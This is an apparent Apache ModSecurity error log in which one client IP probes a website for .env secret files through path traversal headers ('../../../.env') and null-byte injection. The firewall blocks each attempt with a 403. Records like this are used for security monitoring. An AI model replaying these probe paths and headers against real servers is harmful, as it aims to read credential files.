[Tue May 12 04:39:29.176870 2026] [security2:error] [pid 1825287:tid 1825327] [client 45.148.10.166:36578] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS4QgpmE1yW0glLdgfRwAAANU"]
[Tue May 12 04:39:29.177038 2026] [security2:error] [pid 1825287:tid 1825327] [client 45.148.10.166:36578] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS4QgpmE1yW0glLdgfRwAAANU"]
[Tue May 12 04:39:29.193400 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKS4c1tk6y7yBJLpJopwQAAAII"], referer: https://tchatbooster.com/storage/.env
[Tue May 12 04:39:29.193607 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/storage/.env"] [unique_id "agKS4c1tk6y7yBJLpJopwQAAAII"], referer: https://tchatbooster.com/storage/.env
[Tue May 12 04:39:29.523333 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 31 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4Nr1yOh9TvizeziP6AAAAFY"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:29.550177 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4Tue9Sp-pIv_Bb61UAAAAVE"]
[Tue May 12 04:39:29.550226 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4Tue9Sp-pIv_Bb61UAAAAVE"]
[Tue May 12 04:39:29.550255 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4Tue9Sp-pIv_Bb61UAAAAVE"]
[Tue May 12 04:39:29.550451 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4Tue9Sp-pIv_Bb61UAAAAVE"]
[Tue May 12 04:39:29.550499 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4Tue9Sp-pIv_Bb61UAAAAVE"]
[Tue May 12 04:39:29.554996 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4Tue9Sp-pIv_Bb61UAAAAVE"]
[Tue May 12 04:39:29.555424 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4Tue9Sp-pIv_Bb61UAAAAVE"]
[Tue May 12 04:39:29.870178 2026] [ssl:error] [pid 1808852:tid 1808878] (EAI 2)Name or service not known: [client 114.119.142.72:48701] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:39:29.870213 2026] [ssl:error] [pid 1808852:tid 1808878] AH01941: stapling_renew_response: responder error
[Tue May 12 04:39:29.872071 2026] [security2:error] [pid 1825287:tid 1825327] [client 45.148.10.166:36578] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4QgpmE1yW0glLdgfRwAAANU"]
[Tue May 12 04:39:29.891734 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS4dr1yOh9TvizeziP6wAAAFY"], referer: https://tchatbooster.com/assets../../.env.local
[Tue May 12 04:39:29.891965 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS4dr1yOh9TvizeziP6wAAAFY"], referer: https://tchatbooster.com/assets../../.env.local
[Tue May 12 04:39:29.941111 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4c1tk6y7yBJLpJopwQAAAII"], referer: https://tchatbooster.com/storage/.env
[Tue May 12 04:39:29.965665 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/www/.env"] [unique_id "agKS4c1tk6y7yBJLpJopwwAAAIU"]
[Tue May 12 04:39:29.965853 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/www/.env"] [unique_id "agKS4c1tk6y7yBJLpJopwwAAAIU"]
[Tue May 12 04:39:30.265847 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4Tue9Sp-pIv_Bb61UAAAAVE"]
[Tue May 12 04:39:30.283307 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4s1tk6y7yBJLpJopxQAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:30.283359 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4s1tk6y7yBJLpJopxQAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:30.283386 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4s1tk6y7yBJLpJopxQAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:30.283422 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4s1tk6y7yBJLpJopxQAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:30.283637 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4s1tk6y7yBJLpJopxQAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:30.283688 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4s1tk6y7yBJLpJopxQAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:30.283722 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4s1tk6y7yBJLpJopxQAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:30.284181 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 31)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4s1tk6y7yBJLpJopxQAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:30.386797 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4dr1yOh9TvizeziP6wAAAFY"], referer: https://tchatbooster.com/assets../../.env.local
[Tue May 12 04:39:30.414821 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS4jue9Sp-pIv_Bb61UgAAAVE"]
[Tue May 12 04:39:30.414905 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS4jue9Sp-pIv_Bb61UgAAAVE"]
[Tue May 12 04:39:30.415081 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS4jue9Sp-pIv_Bb61UgAAAVE"]
[Tue May 12 04:39:30.469027 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4c1tk6y7yBJLpJopwwAAAIU"]
[Tue May 12 04:39:30.488669 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/www/.env"] [unique_id "agKS4jue9Sp-pIv_Bb61VAAAAUQ"], referer: https://tchatbooster.com/www/.env
[Tue May 12 04:39:30.488886 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/www/.env"] [unique_id "agKS4jue9Sp-pIv_Bb61VAAAAUQ"], referer: https://tchatbooster.com/www/.env
[Tue May 12 04:39:30.778838 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 31 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4s1tk6y7yBJLpJopxQAAAII"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:30.801591 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4s1tk6y7yBJLpJopxgAAAIU"]
